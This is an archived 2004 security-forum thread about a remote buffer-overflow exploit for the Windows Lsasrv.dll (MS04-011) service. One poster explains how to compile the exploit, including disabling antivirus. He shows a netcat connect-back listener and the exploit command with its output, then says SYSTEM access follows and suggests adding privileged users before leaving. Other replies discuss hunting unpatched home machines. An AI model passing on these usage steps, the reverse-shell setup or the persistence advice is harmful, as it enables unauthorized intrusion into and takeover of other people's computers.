Windows Lsasrv.dll Remote Universal Exploit Xp/2k

Full Version: Windows Lsasrv.dll Remote Universal Exploit Xp/2k

GovernmentSecurity.org > The Archives > General Network Security

Pages: 1, 2

what

Jun 17 2004, 05:38 PM

hey, this exploit does work. I just tested it on Windows XP home, SP1, but without the latest patches, and it worked. That's the point I wanted to make I guess.

Also, for those with trouble compiling. . . . .

Add the line #include <iostream.h> to the top of the file. Also change it to lsass.c instead of lsass.cpp .Also, turn off norton antivirus when compiling. Just a few things I would like to advise you to do to get this working.

Connect back is the best way to do hacking. Less trouble with firewalls (generally). This is what I typed to exploit myself, locally. First, fire up netcat with the command:

C:\WINNT>nc -L -p 4444

And just hit enter. Open another command prompt and type (fill in your ip address)

C:\WINNT>lsass 0 24.98.243.*** 4444 24.98.243.***

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 24.98.243.***: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 24.98.243.***:445 ... OK
[*] Attacking ... OK

Now, as long as the Attacking ... OK is there, you currently have SYSTEM level access to the system you just exploited. That's right, you are even more powerful than an administrator. So I suggest we add some users with some power locally, and then get the hell out.

Ecko

Jun 17 2004, 05:56 PM

QUOTE (what @ Jun 17 2004, 05:38 PM)

hey, this exploit does work. I just tested it on Windows XP home, SP1, but without the latest patches, and it worked. That's the point I wanted to make I guess.

ok @ what....if nothing patched

then everything works

...but the most system are patched because they are all afraid of the ssaser gay f*ck worm

Krogoth

Jun 17 2004, 06:50 PM

exploit works fine with connect back as stated in the example above. however most boxes are patched by now. maybe if you're lucky, you'll get a 2Mbit dsl homeuser who's seldom access the box and ignore updates.

realloader

Jun 17 2004, 10:08 PM

We need exploit v0.2
But there is nothing to see.

twistedps

Jun 19 2004, 05:17 AM

QUOTE (tomas\ @ May 3 2004, 12:13 PM)

QUOTE (Corsaro @ May 3 2004, 12:01 PM)

Hi, where i can get lsasrv's exploit for windows? Thank You

did you even look for it?

I'm sick of all these worms popping up when a major vulnerability was found in windows. Especially when all they do is spread themselves and cause irritation by users, and therefore draw attention to the leak. (also in the media)
Maybe thats the intention of the virus maker, to make clear people should patch their systems in time?

early bird gets the box.

xmen

Jun 19 2004, 11:01 AM

very nice

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.